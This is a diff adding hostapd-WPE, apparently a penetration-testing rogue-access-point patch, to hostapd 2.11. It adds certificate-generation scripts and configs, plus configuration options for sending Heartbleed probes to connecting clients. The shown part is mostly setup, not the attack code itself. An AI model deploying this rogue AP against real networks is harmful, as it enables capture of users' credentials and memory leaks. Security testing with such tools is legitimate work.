++.PHONY: ca ++ca: ca.der ++ ++.PHONY: server ++server: server.pem server.vrfy ++ ++.PHONY: verify ++verify: server.vrfy client.vrfy ++ ++passwords.mk: server.cnf ca.cnf client.cnf ++ @echo "PASSWORD_SERVER = '$(shell grep output_password server.cnf | sed 's/.*=//;s/^ *//')'" > $@ ++ @echo "PASSWORD_CA = '$(shell grep output_password ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "PASSWORD_CLIENT = '$(shell grep output_password client.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "USER_NAME = '$(shell grep emailAddress client.cnf | grep '@' | sed 's/.*=//;s/^ *//')'" >> $@ ++ @echo "CA_DEFAULT_DAYS = '$(shell grep default_days ca.cnf | sed 's/.*=//;s/^ *//')'" >> $@ ++ ++###################################################################### ++# ++# Diffie-Hellman parameters ++# ++###################################################################### ++dh: ++ openssl dhparam -out dh -2 $(DH_KEY_SIZE) ++ ++###################################################################### ++# ++# Create a new self-signed CA certificate ++# ++###################################################################### ++ca.key ca.pem: ca.cnf ++ @[ -f index.txt ] || $(MAKE) index.txt ++ @[ -f serial ] || $(MAKE) serial ++ openssl req -new -x509 -keyout ca.key -out ca.pem \ ++ -days $(CA_DEFAULT_DAYS) -config ./ca.cnf ++ ++ca.der: ca.pem ++ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der ++ ++###################################################################### ++# ++# Create a new server certificate, signed by the above CA. ++# ++###################################################################### ++server.csr server.key: server.cnf ++ openssl req -new -out server.csr -keyout server.key -config ./server.cnf ++ ++server.crt: server.csr ca.key ca.pem ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key $(PASSWORD_CA) -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf ++ ++server.p12: server.crt ++ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) ++ ++server.pem: server.p12 ++ openssl pkcs12 -in server.p12 -out server.pem -passin pass:$(PASSWORD_SERVER) -passout pass:$(PASSWORD_SERVER) ++ ++.PHONY: server.vrfy ++server.vrfy: ca.pem ++ @openssl verify -CAfile ca.pem server.pem ++ ++###################################################################### ++# ++# Create a new client certificate, signed by the the above server ++# certificate. ++# ++###################################################################### ++client.csr client.key: client.cnf ++ openssl req -new -out client.csr -keyout client.key -config ./client.cnf ++ ++client.crt: client.csr ca.pem ca.key ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key $(PASSWORD_CA) -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf ++ ++client.p12: client.crt ++ openssl pkcs12 -export -in client.crt -inkey client.key -out client.p12 -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) ++ ++client.pem: client.p12 ++ openssl pkcs12 -in client.p12 -out client.pem -passin pass:$(PASSWORD_CLIENT) -passout pass:$(PASSWORD_CLIENT) ++ cp client.pem $(USER_NAME).pem ++ ++.PHONY: client.vrfy ++client.vrfy: ca.pem client.pem ++ c_rehash . ++ openssl verify -CApath . client.pem ++ ++###################################################################### ++# ++# Miscellaneous rules. ++# ++###################################################################### ++index.txt: ++ @touch index.txt ++ ++serial: ++ @echo '01' > serial ++ ++print: ++ openssl x509 -text -in server.crt ++ ++printca: ++ openssl x509 -text -in ca.pem ++ ++install: ++ install -d $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 dh $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 ca.pem $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 server.pem $(DESTDIR)/etc/hostapd-wpe ++ install -m 644 server.key $(DESTDIR)/etc/hostapd-wpe ++ ++clean: ++ @rm -f *~ *old client.csr client.key client.crt client.p12 client.pem ++ ++# ++# Make a target that people won't run too often. ++# ++destroycerts: ++ rm -f *~ dh *.csr *.crt *.p12 *.der *.pem *.key index.txt* \ ++ serial* *\.0 *\.1 +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/README hostapd-2.11-wpe/hostapd/certs/README +--- hostapd-2.11/hostapd/certs/README 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/README 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,226 @@ ++ This directory contains scripts to create the server certificates. ++To make a set of default (i.e. test) certificates, simply type: ++ ++$ ./bootstrap ++ ++ The "openssl" command will be run against the sample configuration ++files included here, and will make a self-signed certificate authority ++(i.e. root CA), and a server certificate. This "root CA" should be ++installed on any client machine needing to do EAP-TLS, PEAP, or ++EAP-TTLS. ++ ++ The Microsoft "XP Extensions" will be automatically included in the ++server certificate. Without those extensions Windows clients will ++refuse to authenticate to FreeRADIUS. ++ ++ The root CA and the "XP Extensions" file also contain a crlDistributionPoints ++attribute. The latest release of Windows Phone needs this to be present ++for the handset to validate the RADIUS server certificate. The RADIUS ++server must have the URI defined but the CA need not have...however it ++is best practice for a CA to have a revocation URI. Note that whilst ++the Windows Mobile client cannot actually use the CRL when doing 802.1X ++it is recommended that the URI be an actual working URL and contain a ++revocation format file as there may be other OS behaviour at play and ++future OSes that may do something with that URI. ++ ++ In general, you should use self-signed certificates for 802.1x (EAP) ++authentication. When you list root CAs from other organisations in ++the "ca_file", you permit them to masquerade as you, to authenticate ++your users, and to issue client certificates for EAP-TLS. ++ ++ If FreeRADIUS was configured to use OpenSSL, then simply starting ++the server in root in debugging mode should also create test ++certificates, i.e.: ++ ++$ radiusd -X ++ ++ That will cause the EAP-TLS module to run the "bootstrap" script in ++this directory. The script will be executed only once, the first time ++the server has been installed on a particular machine. This bootstrap ++script SHOULD be run on installation of any pre-built binary package ++for your OS. In any case, the script will ensure that it is not run ++twice, and that it does not over-write any existing certificates. ++ ++ If you already have CA and server certificates, rename (or delete) ++this directory, and create a new "certs" directory containing your ++certificates. Note that the "make install" command will NOT ++over-write your existing "raddb/certs" directory, which means that the ++"bootstrap" command will not be run. ++ ++ ++ NEW INSTALLATIONS OF FREERADIUS ++ ++ ++ We suggest that new installations use the test certificates for ++initial tests, and then create real certificates to use for normal ++user authentication. See the instructions below for how to create the ++various certificates. The old test certificates can be deleted by ++running the following command: ++ ++$ rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* ++ ++ Then, follow the instructions below for creating real certificates. ++ ++ Once the final certificates have been created, you can delete the ++"bootstrap" command from this directory, and delete the ++"make_cert_command" configuration from the "tls" sub-section of ++eap.conf. ++ ++ If you do not want to enable EAP-TLS, PEAP, or EAP-TTLS, then delete ++the relevant sub-sections from the "eap.conf" file. ++ ++ ++ MAKING A ROOT CERTIFICATE ++ ++ ++$ vi ca.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the CA certificate. ++ ++ Edit the [certificate_authority] section to have the correct values ++ for your country, state, etc. ++ ++$ make ca.pem ++ ++ This step creates the CA certificate. ++ ++$ make ca.der ++ ++ This step creates the DER format of the self-signed certificate, ++ which is can be imported into Windows. ++ ++ ++ MAKING A SERVER CERTIFICATE ++ ++ ++$ vi server.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the server certificate. ++ ++ Edit the [server] section to have the correct values for your ++ country, state, etc. Be sure that the commonName field here is ++ different from the commonName for the CA certificate. ++ ++$ make server.pem ++ ++ This step creates the server certificate. ++ ++ If you have an existing certificate authority, and wish to create a ++ certificate signing request for the server certificate, edit ++ server.cnf as above, and type the following command. ++ ++$ make server.csr ++ ++ You will have to ensure that the certificate contains the XP ++ extensions needed by Microsoft clients. ++ ++ ++ MAKING A CLIENT CERTIFICATE ++ ++ ++ Client certificates are used by EAP-TLS, and optionally by EAP-TTLS ++and PEAP. The following steps outline how to create a client ++certificate that is signed by the server certificate created above. ++You will have to have the password for the server certificate in the ++"input_password" and "output_password" fields of the server.cnf file. ++ ++ ++$ vi client.cnf ++ ++ Edit the "input_password" and "output_password" fields to be the ++ password for the client certificate. You will have to give these ++ passwords to the end user who will be using the certificates. ++ ++ Edit the [client] section to have the correct values for your ++ country, state, etc. Be sure that the commonName field here is ++ the User-Name that will be used for logins! ++ ++$ make client.pem ++ ++ The users certificate will be in "emailAddress.pem", ++ i.e. "user@example.com.pem". ++ ++ To create another client certificate, just repeat the steps for ++ making a client certificate, being sure to enter a different login ++ name for "commonName", and a different password. ++ ++ ++ PERFORMANCE ++ ++ ++ EAP performance for EAP-TLS, TTLS, and PEAP is dominated by SSL ++ calculations. That is, a normal system can handle PAP ++ authentication at a rate of 10k packets/s. However, SSL involves ++ RSA calculations, which are very expensive. To benchmark your system, ++ do: ++ ++$ openssl speed rsa ++ ++ or ++ ++$ openssl speed rsa2048 ++ ++ to test 2048 bit keys. ++ ++ A 1GHz system will likely do 30 calculations/s. A 2GHz system may ++ do 50 calculations/s, or more. That number is also the number of ++ authentications/s that can be done for EAP-TLS (or TTLS, or PEAP). ++ ++ ++ COMPATIBILITY ++ ++The certificates created using this method are known to be compatible ++with ALL operating systems. Some common issues are: ++ ++ - Windows requires certain OIDs in the certificates. If it doesn't ++ see them, it will stop doing EAP. The most visible effect is ++ that the client starts EAP, gets a few Access-Challenge packets, ++ and then a little while later re-starts EAP. If this happens, see ++ the FAQ, and the comments in raddb/eap.conf for how to fix it. ++ ++ - Windows requires the root certificates to be on the client PC. ++ If it doesn't have them, you will see the same issue as above. ++ ++ - Windows XP post SP2 has a bug where it has problems with ++ certificate chains. i.e. if the server certificate is an ++ intermediate one, and not a root one, then authentication will ++ silently fail, as above. ++ ++ - Some versions of Windows CE cannot handle 4K RSA certificates. ++ They will (again) silently fail, as above. ++ ++ - In none of these cases will Windows give the end user any ++ reasonable error message describing what went wrong. This leads ++ people to blame the RADIUS server. That blame is misplaced. ++ ++ - Certificate chains of more than 64K bytes are known to not work. ++ This is a problem in FreeRADIUS. However, most clients cannot ++ handle 64K certificate chains. Most Access Points will shut down ++ the EAP session after about 50 round trips, while 64K certificate ++ chains will take about 60 round trips. So don't use large ++ certificate chains. They will only work after everyone upgrade ++ everything in the network. ++ ++ - All other operating systems are known to work with EAP and ++ FreeRADIUS. This includes Linux, *BSD, Mac OS X, Solaris, ++ Symbian, along with all known embedded systems, phones, WiFi ++ devices, etc. ++ ++ - Someone needs to ask Microsoft to please stop making life hard for ++ their customers. ++ ++ ++ SECURITY CONSIDERATIONS ++ ++The default certificate configuration files uses MD5 for message ++digests, to maintain compatibility with network equipment that ++supports only this algorithm. ++ ++MD5 has known weaknesses and is discouraged in favour of SHA1 (see ++http://www.kb.cert.org/vuls/id/836068 for details). If your network ++equipment supports the SHA1 signature algorithm, we recommend that you ++change the "ca.cnf", "server.cnf", and "client.cnf" files to specify ++the use of SHA1 for the certificates. To do this, change the ++'default_md' entry in those files from 'md5' to 'sha1'. +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/README.wpe hostapd-2.11-wpe/hostapd/certs/README.wpe +--- hostapd-2.11/hostapd/certs/README.wpe 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/README.wpe 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,13 @@ ++# Certificate creation for Hostapd-WPE # ++######################################## ++ ++Usage: ++ ++make clean ++./bootstrap ++make install ++ ++Notes: ++- Windows 10 (and possibly any Windows starting from Vista) will fail EAP ++ if certificates signed with MD5 are used. ++- Generated certificates used a SHA256 signature. +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/bootstrap hostapd-2.11-wpe/hostapd/certs/bootstrap +--- hostapd-2.11/hostapd/certs/bootstrap 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/bootstrap 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,82 @@ ++#!/bin/sh ++# ++# This is a wrapper script to create default certificates when the ++# server first starts in debugging mode. Once the certificates have been ++# created, this file should be deleted. ++# ++# Ideally, this program should be run as part of the installation of any ++# binary package. The installation should also ensure that the permissions ++# and owners are correct for the files generated by this script. ++# ++# $Id: c9d939beac8d5bdc21ea1ff9233442f9ab933297 $ ++# ++umask 027 ++cd `dirname $0` ++ ++make -h > /dev/null 2>&1 ++ ++# ++# If we have a working "make", then use it. Otherwise, run the commands ++# manually. ++# ++if [ "$?" = "0" ]; then ++ make all ++ exit $? ++fi ++ ++# ++# The following commands were created by running "make -n", and edited ++# to remove the trailing backslash, and to add "exit 1" after the commands. ++# ++# Don't edit the following text. Instead, edit the Makefile, and ++# re-generate these commands. ++# ++if [ ! -f dh ]; then ++ openssl dhparam -out dh 1024 || exit 1 ++ if [ -e /dev/urandom ] ; then ++ ln -sf /dev/urandom random ++ else ++ date > ./random; ++ fi ++fi ++ ++if [ ! -f server.key ]; then ++ openssl req -new -out server.csr -keyout server.key -config ./server.cnf || exit 1 ++fi ++ ++if [ ! -f ca.key ]; then ++ openssl req -new -x509 -keyout ca.key -out ca.pem -days `grep default_days ca.cnf | sed 's/.*=//;s/^ *//'` -config ./ca.cnf || exit 1 ++fi ++ ++if [ ! -f index.txt ]; then ++ touch index.txt ++fi ++ ++if [ ! -f serial ]; then ++ echo '01' > serial ++fi ++ ++if [ ! -f server.crt ]; then ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in server.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out server.crt -extensions xpserver_ext -extfile xpextensions -config ./server.cnf || exit 1 ++fi ++ ++if [ ! -f server.p12 ]; then ++ openssl pkcs12 -export -in server.crt -inkey server.key -out server.p12 -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 ++fi ++ ++if [ ! -f server.pem ]; then ++ openssl pkcs12 -in server.p12 -out server.pem -passin pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` -passout pass:`grep output_password server.cnf | sed 's/.*=//;s/^ *//'` || exit 1 ++ openssl verify -CAfile ca.pem server.pem || exit 1 ++fi ++ ++if [ ! -f ca.der ]; then ++ openssl x509 -inform PEM -outform DER -in ca.pem -out ca.der || exit 1 ++fi ++ ++if [ ! -f client.key ]; then ++ openssl req -new -out client.csr -keyout client.key -config ./client.cnf ++fi ++ ++if [ ! -f client.crt ]; then ++ openssl ca -batch -keyfile ca.key -cert ca.pem -in client.csr -key `grep output_password ca.cnf | sed 's/.*=//;s/^ *//'` -out client.crt -extensions xpclient_ext -extfile xpextensions -config ./client.cnf ++fi +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/ca.cnf hostapd-2.11-wpe/hostapd/certs/ca.cnf +--- hostapd-2.11/hostapd/certs/ca.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/ca.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,62 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/ca.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/ca.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 365 ++default_crl_days = 364 ++default_md = sha256 ++preserve = no ++policy = policy_match ++crlDistributionPoints = URI:http://www.example.org/example_ca.crl ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = certificate_authority ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++x509_extensions = v3_ca ++ ++[certificate_authority] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. ++emailAddress = admin@example.org ++commonName = "Example Certificate Authority" ++ ++[v3_ca] ++subjectKeyIdentifier = hash ++authorityKeyIdentifier = keyid:always,issuer:always ++basicConstraints = critical,CA:true ++crlDistributionPoints = URI:http://www.example.org/example_ca.crl ++ +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/client.cnf hostapd-2.11-wpe/hostapd/certs/client.cnf +--- hostapd-2.11/hostapd/certs/client.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/client.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,53 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/ca.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/ca.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 365 ++default_crl_days = 364 ++default_md = sha256 ++preserve = no ++policy = policy_match ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = client ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++ ++[client] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. ++emailAddress = user@example.org ++commonName = user@example.org +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/demoCA/cacert.pem hostapd-2.11-wpe/hostapd/certs/demoCA/cacert.pem +--- hostapd-2.11/hostapd/certs/demoCA/cacert.pem 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/demoCA/cacert.pem 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,22 @@ ++-----BEGIN CERTIFICATE----- ++MIIDtjCCAx+gAwIBAgIBADANBgkqhkiG9w0BAQQFADCBnzELMAkGA1UEBhMCQ0Ex ++ETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQHEwlTb21lIENpdHkxFTATBgNVBAoT ++DE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9jYWxob3N0MRswGQYDVQQDExJDbGll ++bnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0BCQEWEmNsaWVudEBleGFtcGxlLmNv ++bTAeFw0wNDAxMjUxMzI2MDdaFw0wNjAxMjQxMzI2MDdaMIGfMQswCQYDVQQGEwJD ++QTERMA8GA1UECBMIUHJvdmluY2UxEjAQBgNVBAcTCVNvbWUgQ2l0eTEVMBMGA1UE ++ChMMT3JnYW5pemF0aW9uMRIwEAYDVQQLEwlsb2NhbGhvc3QxGzAZBgNVBAMTEkNs ++aWVudCBjZXJ0aWZpY2F0ZTEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGV4YW1wbGUu ++Y29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUxbGXJPFkrPH/sYnbHI+/ ++9PFDlup8sekPeNaUUXJTd4ld/lLMuZtB6A3etYsSepQ/T1jLxWKHgZL73G/s6fhx ++58Ew01z1GIgX6bEzJJ7dKhx10xBDrodVPOx6d+8mqn10KB25t34XxkRsXdmxiLQy ++UMoCKZY3IqEjpyawC0An/QIDAQABo4H/MIH8MB0GA1UdDgQWBBRo020+Hue8nVoF ++cCHDY9oTZdGt4zCBzAYDVR0jBIHEMIHBgBRo020+Hue8nVoFcCHDY9oTZdGt46GB ++paSBojCBnzELMAkGA1UEBhMCQ0ExETAPBgNVBAgTCFByb3ZpbmNlMRIwEAYDVQQH ++EwlTb21lIENpdHkxFTATBgNVBAoTDE9yZ2FuaXphdGlvbjESMBAGA1UECxMJbG9j ++YWxob3N0MRswGQYDVQQDExJDbGllbnQgY2VydGlmaWNhdGUxITAfBgkqhkiG9w0B ++CQEWEmNsaWVudEBleGFtcGxlLmNvbYIBADAMBgNVHRMEBTADAQH/MA0GCSqGSIb3 ++DQEBBAUAA4GBADPAC2ax5Xnvc6BnmCUtq41eVRH8AP0nbYDRL4NHd8Z0P9wnQ/yh ++UHcE5LwJeeT2CsOtnug+bzRzaSKdH3cim6LpgjWdpWMCSgAWPbptbJhsC60or4UT ++L/jw12UBvxt8Lf9ljOHmLAGZe25k4+jUNzNUzpkShHZRU5BjuFu8VIXF ++-----END CERTIFICATE----- +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/server.cnf hostapd-2.11-wpe/hostapd/certs/server.cnf +--- hostapd-2.11/hostapd/certs/server.cnf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/server.cnf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,54 @@ ++[ ca ] ++default_ca = CA_default ++ ++[ CA_default ] ++dir = ./ ++certs = $dir ++crl_dir = $dir/crl ++database = $dir/index.txt ++new_certs_dir = $dir ++certificate = $dir/server.pem ++serial = $dir/serial ++crl = $dir/crl.pem ++private_key = $dir/server.key ++RANDFILE = $dir/.rand ++name_opt = ca_default ++cert_opt = ca_default ++default_days = 60 ++default_crl_days = 30 ++default_md = sha256 ++preserve = no ++policy = policy_match ++ ++[ policy_match ] ++countryName = match ++stateOrProvinceName = match ++organizationName = match ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ policy_anything ] ++countryName = optional ++stateOrProvinceName = optional ++localityName = optional ++organizationName = optional ++organizationalUnitName = optional ++commonName = supplied ++emailAddress = optional ++ ++[ req ] ++prompt = no ++distinguished_name = server ++default_bits = 2048 ++input_password = whatever ++output_password = whatever ++ ++[server] ++countryName = FR ++stateOrProvinceName = Radius ++localityName = Somewhere ++organizationName = Example Inc. ++emailAddress = admin@example.org ++commonName = "Example Server Certificate" ++ +diff '--color=auto' -rupN hostapd-2.11/hostapd/certs/xpextensions hostapd-2.11-wpe/hostapd/certs/xpextensions +--- hostapd-2.11/hostapd/certs/xpextensions 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/certs/xpextensions 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,24 @@ ++# ++# File containing the OIDs required for Windows. ++# ++# http://support.microsoft.com/kb/814394/en-us ++# ++[ xpclient_ext] ++extendedKeyUsage = 1.3.6.1.5.5.7.3.2 ++crlDistributionPoints = URI:http://www.example.com/example_ca.crl ++ ++[ xpserver_ext] ++extendedKeyUsage = 1.3.6.1.5.5.7.3.1 ++crlDistributionPoints = URI:http://www.example.com/example_ca.crl ++ ++# ++# Add this to the PKCS#7 keybag attributes holding the client's private key ++# for machine authentication. ++# ++# the presence of this OID tells Windows XP that the cert is intended ++# for use by the computer itself, and not by an end-user. ++# ++# The other solution is to use Microsoft's web certificate server ++# to generate these certs. ++# ++# 1.3.6.1.4.1.311.17.2 +diff '--color=auto' -rupN hostapd-2.11/hostapd/config_file.c hostapd-2.11-wpe/hostapd/config_file.c +--- hostapd-2.11/hostapd/config_file.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/config_file.c 2024-07-26 09:11:33.200000000 +0000 +@@ -24,7 +24,7 @@ + #include "ap/wpa_auth.h" + #include "ap/ap_config.h" + #include "config_file.h" +- ++#include "wpe/wpe.h" + + #ifndef CONFIG_NO_VLAN + static int hostapd_config_read_vlan_file(struct hostapd_bss_config *bss, +@@ -2606,6 +2606,22 @@ static int hostapd_config_fill(struct ho + } + bss->eapol_version = eapol_version; + wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version); ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ } else if (os_strcmp(buf, "wpe_logfile") == 0) { ++ wpe_conf.wpe_logfile = os_strdup(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) { ++ wpe_conf.wpe_hb_send_before_handshake = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) { ++ wpe_conf.wpe_hb_send_before_appdata = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) { ++ wpe_conf.wpe_hb_send_after_appdata = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) { ++ wpe_conf.wpe_hb_payload_size = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) { ++ wpe_conf.wpe_hb_num_repeats = atoi(pos); ++ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) { ++ wpe_conf.wpe_hb_num_tries = atoi(pos); ++#endif /* #if OPENSSL_VERSION_NUMBER < 0x10100000L */ + #ifdef EAP_SERVER + } else if (os_strcmp(buf, "eap_authenticator") == 0) { + bss->eap_server = atoi(pos); +diff '--color=auto' -rupN hostapd-2.11/hostapd/hostapd-wpe.conf hostapd-2.11-wpe/hostapd/hostapd-wpe.conf +--- hostapd-2.11/hostapd/hostapd-wpe.conf 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/hostapd/hostapd-wpe.conf 2024-07-26 09:11:33.200000000 +0000 +@@ -0,0 +1,2042 @@ ++# Configuration file for hostapd-wpe ++ ++# Interface - Probably wlan0 for 802.11, eth0 for wired ++interface=wlan0 ++ ++# May have to change these depending on build location ++eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user ++ca_cert=/etc/hostapd-wpe/ca.pem ++server_cert=/etc/hostapd-wpe/server.pem ++private_key=/etc/hostapd-wpe/server.key ++private_key_passwd=whatever ++dh_file=/etc/hostapd-wpe/dh ++ ++# 802.11 Options ++ssid=hostapd-wpe ++channel=1 ++ ++# WPE Options - Dont need to change these to make it all work ++# ++# wpe_logfile=somefile # (Default: ./hostapd-wpe.log) ++# wpe_hb_send_before_handshake=0 # Heartbleed True/False (Default: 1) ++# wpe_hb_send_before_appdata=0 # Heartbleed True/False (Default: 0) ++# wpe_hb_send_after_appdata=0 # Heartbleed True/False (Default: 0) ++# wpe_hb_payload_size=0 # Heartbleed 0-65535 (Default: 50000) ++# wpe_hb_num_repeats=0 # Heartbleed 0-65535 (Default: 1) ++# wpe_hb_num_tries=0 # Heartbleed 0-65535 (Default: 1) ++ ++ ++# Dont mess with unless you know what you're doing ++eap_server=1 ++eap_fast_a_id=101112131415161718191a1b1c1d1e1f ++eap_fast_a_id_info=hostapd-wpe ++eap_fast_prov=3 ++ieee8021x=1 ++pac_key_lifetime=604800 ++pac_key_refresh_time=86400 ++pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f ++wpa=2 ++wpa_key_mgmt=WPA-EAP ++wpa_pairwise=CCMP ++rsn_pairwise=CCMP ++ ++############################################################################## ++# Everything below this line is pretty much the standard hostapd.conf ++############################################################################### ++ ++##### hostapd configuration file ############################################## ++# Empty lines and lines starting with # are ignored ++ ++# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for ++# management frames with the Host AP driver); wlan0 with many nl80211 drivers ++# Note: This attribute can be overridden by the values supplied with the '-i' ++# command line parameter. ++#interface=wlan0 ++ ++# In case of atheros and nl80211 driver interfaces, an additional ++# configuration parameter, bridge, may be used to notify hostapd if the ++# interface is included in a bridge. This parameter is not used with Host AP ++# driver. If the bridge parameter is not set, the drivers will automatically ++# figure out the bridge interface (assuming sysfs is enabled and mounted to ++# /sys) and this parameter may not be needed. ++# ++# For nl80211, this parameter can be used to request the AP interface to be ++# added to the bridge automatically (brctl may refuse to do this before hostapd ++# has been started to change the interface mode). If needed, the bridge ++# interface is also created. ++#bridge=br0 ++ ++# Driver interface type (hostap/wired/none/nl80211/bsd); ++# default: hostap). nl80211 is used with all Linux mac80211 drivers. ++# Use driver=none if building hostapd as a standalone RADIUS server that does ++# not control any wireless/wired driver. ++# driver=hostap ++ ++# Driver interface parameters (mainly for development testing use) ++# driver_params= ++ ++# hostapd event logger configuration ++# ++# Two output method: syslog and stdout (only usable if not forking to ++# background). ++# ++# Module bitfield (ORed bitfield of modules that will be logged; -1 = all ++# modules): ++# bit 0 (1) = IEEE 802.11 ++# bit 1 (2) = IEEE 802.1X ++# bit 2 (4) = RADIUS ++# bit 3 (8) = WPA ++# bit 4 (16) = driver interface ++# bit 5 (32) = IAPP ++# bit 6 (64) = MLME ++# ++# Levels (minimum value for logged events): ++# 0 = verbose debugging ++# 1 = debugging ++# 2 = informational messages ++# 3 = notification ++# 4 = warning ++# ++logger_syslog=-1 ++logger_syslog_level=2 ++logger_stdout=-1 ++logger_stdout_level=2 ++ ++# Interface for separate control program. If this is specified, hostapd ++# will create this directory and a UNIX domain socket for listening to requests ++# from external programs (CLI/GUI, etc.) for status information and ++# configuration. The socket file will be named based on the interface name, so ++# multiple hostapd processes/interfaces can be run at the same time if more ++# than one interface is used. ++# /var/run/hostapd is the recommended directory for sockets and by default, ++# hostapd_cli will use it when trying to connect with hostapd. ++ctrl_interface=/var/run/hostapd ++ ++# Access control for the control interface can be configured by setting the ++# directory to allow only members of a group to use sockets. This way, it is ++# possible to run hostapd as root (since it needs to change network ++# configuration and open raw sockets) and still allow GUI/CLI components to be ++# run as non-root users. However, since the control interface can be used to ++# change the network configuration, this access needs to be protected in many ++# cases. By default, hostapd is configured to use gid 0 (root). If you ++# want to allow non-root users to use the contron interface, add a new group ++# and change this value to match with that group. Add users that should have ++# control interface access to this group. ++# ++# This variable can be a group name or gid. ++#ctrl_interface_group=wheel ++ctrl_interface_group=0 ++ ++ ++##### IEEE 802.11 related configuration ####################################### ++ ++# SSID to be used in IEEE 802.11 management frames ++#ssid=test ++# Alternative formats for configuring SSID ++# (double quoted string, hexdump, printf-escaped string) ++#ssid2="test" ++#ssid2=74657374 